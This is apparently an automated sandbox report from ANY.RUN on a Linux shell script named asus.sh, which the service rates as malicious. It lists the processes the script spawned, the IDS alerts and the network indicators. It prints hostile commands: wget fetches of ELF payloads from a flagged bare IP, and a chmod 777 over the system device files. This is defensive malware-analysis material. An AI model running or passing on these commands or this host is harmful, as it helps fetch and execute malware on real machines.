File name: asus.sh

Full analysis: https://app.any.run/tasks/66866644-47dc-4464-8182-292d371eff2c
Verdict: Malicious activity
Analysis date: June 19, 2025, 06:14:49
OS: Ubuntu 22.04.2
Tags: auto, generic
MIME: text/plain
File info: ASCII text
MD5: 51040DED77ED8881EBCE7E2E9C31FE1A
SHA1: BB73D5306F6F0A6ED7B891A49353CA157BC5762B
SHA256: A09C12EB2A57BFE5326BFE0C36ED3CD2E5D4B41735F31407D87D3703CB20EC83
SSDEEP: 12:BFS64iSFSl6qheSFS0EU64iDl6qheD0ET:zSq2SFe2S0ZqDFeD0a

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • GENERIC has been found (auto)

      • wget (PID: 41416)
      • wget (PID: 41430)
      • wget (PID: 41435)
  • SUSPICIOUS

    • Uses wget to download content

      • bash (PID: 41401)
    • Modifies file or directory owner

      • sudo (PID: 41396)
    • Executes commands using command-line interpreter

      • sudo (PID: 41399)
      • bash (PID: 41401)
    • Potential Corporate Privacy Violation

      • wget (PID: 41416)
      • wget (PID: 41430)
      • wget (PID: 41403)
      • wget (PID: 41435)
      • wget (PID: 41412)
      • wget (PID: 41408)
    • Connects to the server without a host name

      • wget (PID: 41430)
      • wget (PID: 41412)
      • wget (PID: 41416)
      • wget (PID: 41408)
      • wget (PID: 41435)
    • Executes the "rm" command to delete files or directories

      • bash (PID: 41401)
  • INFO

    • Checks timezone

      • wget (PID: 41403)
      • wget (PID: 41416)
      • wget (PID: 41430)
      • wget (PID: 41435)
      • wget (PID: 41408)
      • wget (PID: 41412)
    • Creates file in the temporary folder

      • wget (PID: 41416)
      • wget (PID: 41430)
      • wget (PID: 41435)
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 170
Monitored processes: 39
Malicious processes: 5
Suspicious processes: 1

Behavior graph

Processes in the behavior graph, in the order shown (#GENERIC marks the wget processes matched by the GENERIC signature):
dash, sudo, chown, chmod, sudo, bash, locale-check, wget, chmod, bash, rm, wget, chmod, bash, rm, wget, chmod, bash, rm, wget (#GENERIC), systemctl, systemctl, systemctl, systemctl, systemctl, chmod, bash, rm, wget (#GENERIC), chmod, bash, rm, wget (#GENERIC), chmod, bash, rm, cron, dash, run-parts

Process information

PID: 41395
CMD: /bin/sh -c "sudo chown user /home/user/Desktop/asus\.sh && chmod +x /home/user/Desktop/asus\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/asus\.sh "
Path: /usr/bin/dash
Parent process: UbvyYXL4x2mYa65Q
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41396
CMD: sudo chown user /home/user/Desktop/asus.sh
Path: /usr/bin/sudo
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
  • /usr/lib/x86_64-linux-gnu/libselinux.so.1
  • /usr/libexec/sudo/libsudo_util.so.0.0.0
  • /usr/lib/x86_64-linux-gnu/libc.so.6
  • /usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
  • /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
  • /usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
  • /usr/libexec/sudo/sudoers.so
  • /usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
  • /usr/lib/x86_64-linux-gnu/libz.so.1.2.11

PID: 41397
CMD: chown user /home/user/Desktop/asus.sh
Path: /usr/bin/chown
Parent process: sudo
User: root
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41398
CMD: chmod +x /home/user/Desktop/asus.sh
Path: /usr/bin/chmod
Parent process: dash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41399
CMD: sudo -iu user /home/user/Desktop/asus.sh
Path: /usr/bin/sudo
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
  • /usr/lib/x86_64-linux-gnu/libselinux.so.1
  • /usr/libexec/sudo/libsudo_util.so.0.0.0
  • /usr/lib/x86_64-linux-gnu/libc.so.6
  • /usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
  • /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
  • /usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
  • /usr/libexec/sudo/sudoers.so
  • /usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
  • /usr/lib/x86_64-linux-gnu/libz.so.1.2.11

PID: 41401
CMD: -bash --login -c \/home\/user\/Desktop\/asus\.sh
Path: /usr/bin/bash
Parent process: sudo
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
  • /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41402
CMD: /usr/bin/locale-check C.UTF-8
Path: /usr/bin/locale-check
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41403
CMD: wget http://45.125.66.79/j/mle1
Path: /usr/bin/wget
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 768
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
  • /usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
  • /usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
  • /usr/lib/x86_64-linux-gnu/libssl.so.3
  • /usr/lib/x86_64-linux-gnu/libcrypto.so.3
  • /usr/lib/x86_64-linux-gnu/libz.so.1.2.11
  • /usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
  • /usr/lib/x86_64-linux-gnu/libc.so.6
  • /usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0

PID: 41405
CMD: chmod 777 autofs block bsg btrfs-control bus char console core cpu cpu_dma_latency cuse disk dma_heap dri ecryptfs fb0 fd full fuse hidraw0 hpet hugepages hwrng i2c-0 initctl input kmsg log loop0 loop1 loop10 loop11 loop12 loop13 loop14 loop15 loop16 loop17 loop18 loop19 loop2 loop3 loop4 loop5 loop6 loop7 loop8 loop9 loop-control mapper mcelog mem mqueue net null nvram port ppp psaux ptmx pts random rfkill rtc rtc0 sda sda1 sda2 sda3 sg0 shm snapshot snd stderr stdin stdout tty tty0 tty1 tty10 tty11 tty12 tty13 tty14 tty15 tty16 tty17 tty18 tty19 tty2 tty20 tty21 tty22 tty23 tty24 tty25 tty26 tty27 tty28 tty29 tty3 tty30 tty31 tty32 tty33 tty34 tty35 tty36 tty37 tty38 tty39 tty4 tty40 tty41 tty42 tty43 tty44 tty45 tty46 tty47 tty48 tty49 tty5 tty50 tty51 tty52 tty53 tty54 tty55 tty56 tty57 tty58 tty59 tty6 tty60 tty61 tty62 tty63 tty7 tty8 tty9 ttyprintk ttyS0 ttyS1 ttyS10 ttyS11 ttyS12 ttyS13 ttyS14 ttyS15 ttyS16 ttyS17 ttyS18 ttyS19 ttyS2 ttyS20 ttyS21 ttyS22 ttyS23 ttyS24 ttyS25 ttyS26 ttyS27 ttyS28 ttyS29 ttyS3 ttyS30 ttyS31 ttyS4 ttyS5 ttyS6 ttyS7 ttyS8 ttyS9 udmabuf uhid uinput urandom userfaultfd userio vcs vcs1 vcs2 vcs3 vcs4 vcs5 vcs6 vcsa vcsa1 vcsa2 vcsa3 vcsa4 vcsa5 vcsa6 vcsu vcsu1 vcsu2 vcsu3 vcsu4 vcsu5 vcsu6 vfio vga_arbiter vhci vhost-net vhost-vsock zero zfs
Path: /usr/bin/chmod
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 256
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41406
CMD: -bash --login -c \/home\/user\/Desktop\/asus\.sh
Path: /usr/bin/bash
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 32512
Executable files: 0
Suspicious files: 0
Text files: 0
Unknown types: 3

Dropped files

PID | Process | Filename | Type
41416 | wget | /tmp/mle1 | o
  MD5:
  SHA256:
41430 | wget | /tmp/mbe1 (deleted) | o
  MD5:
  SHA256:
41435 | wget | /tmp/a5le1 | o
  MD5:
  SHA256:
HTTP(S) requests: 29
TCP/UDP connections: 17
DNS requests: 13
Threats: 7

HTTP requests

The PID and Process columns are empty for every row in the report; the remaining columns are:
Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
GET | 200 | 195.181.175.40:443 | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | binary | 1.49 Mb | whitelisted
GET | | 185.125.190.96:80 | http://connectivity-check.ubuntu.com/ | unknown | | | whitelisted
GET | 200 | 195.181.175.40:443 | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | binary | 1.49 Mb | whitelisted
GET | 204 | 185.125.190.96:80 | http://connectivity-check.ubuntu.com/ | unknown | | | whitelisted
GET | 200 | 169.150.255.184:443 | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | binary | 1.49 Mb | whitelisted
GET | 200 | 195.181.175.40:443 | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | binary | 1.49 Mb | whitelisted
POST | 200 | 185.125.188.54:443 | https://api.snapcraft.io/v2/snaps/refresh | unknown | binary | 45.5 Kb | whitelisted
GET | | 185.125.190.96:80 | http://connectivity-check.ubuntu.com/ | unknown | | | whitelisted
POST | 200 | 185.125.188.58:443 | https://api.snapcraft.io/v2/snaps/refresh | unknown | binary | 45.5 Kb | whitelisted
GET | 200 | 169.150.255.181:443 | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | binary | 1.49 Mb | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
| | 185.125.190.96:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted
484 | avahi-daemon | 224.0.0.251:5353 | | | | unknown
| | 169.150.255.181:443 | odrs.gnome.org | | GB | whitelisted
512 | snapd | 185.125.188.54:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
41403 | wget | 45.125.66.79:80 | | Tele Asia Limited | LT | malicious
512 | snapd | 185.125.188.58:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
41408 | wget | 45.125.66.79:80 | | Tele Asia Limited | LT | malicious
41412 | wget | 45.125.66.79:80 | | Tele Asia Limited | LT | malicious
41416 | wget | 45.125.66.79:80 | | Tele Asia Limited | LT | malicious
512 | snapd | 185.125.188.59:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted

DNS requests

Domain (reputation), followed by the IPs it resolved to:

connectivity-check.ubuntu.com (whitelisted)
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::2a
  • 2001:67c:1562::24
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::23
  • 2620:2d:4002:1::196
  • 2620:2d:4002:1::198
  • 2620:2d:4002:1::197
  • 2001:67c:1562::23
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::96
  • 185.125.190.96
  • 185.125.190.97
  • 185.125.190.98
  • 91.189.91.48
  • 91.189.91.98
  • 185.125.190.49
  • 91.189.91.49
  • 91.189.91.96
  • 185.125.190.17
  • 91.189.91.97
  • 185.125.190.18
  • 185.125.190.48
odrs.gnome.org (whitelisted)
  • 169.150.255.181
  • 37.19.194.80
  • 195.181.175.40
  • 169.150.255.183
  • 207.211.211.27
  • 212.102.56.179
  • 195.181.170.19
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::107
google.com (whitelisted)
  • 142.250.185.174
  • 2a00:1450:4001:811::200e
api.snapcraft.io (whitelisted)
  • 185.125.188.54
  • 185.125.188.57
  • 185.125.188.58
  • 185.125.188.59
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::42
13.100.168.192.in-addr.arpa (unknown; no IP listed)

Threats

PID | Process | Class | Message
41403 | wget | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 5
41416 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41430 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41435 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41403 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41408 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41412 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info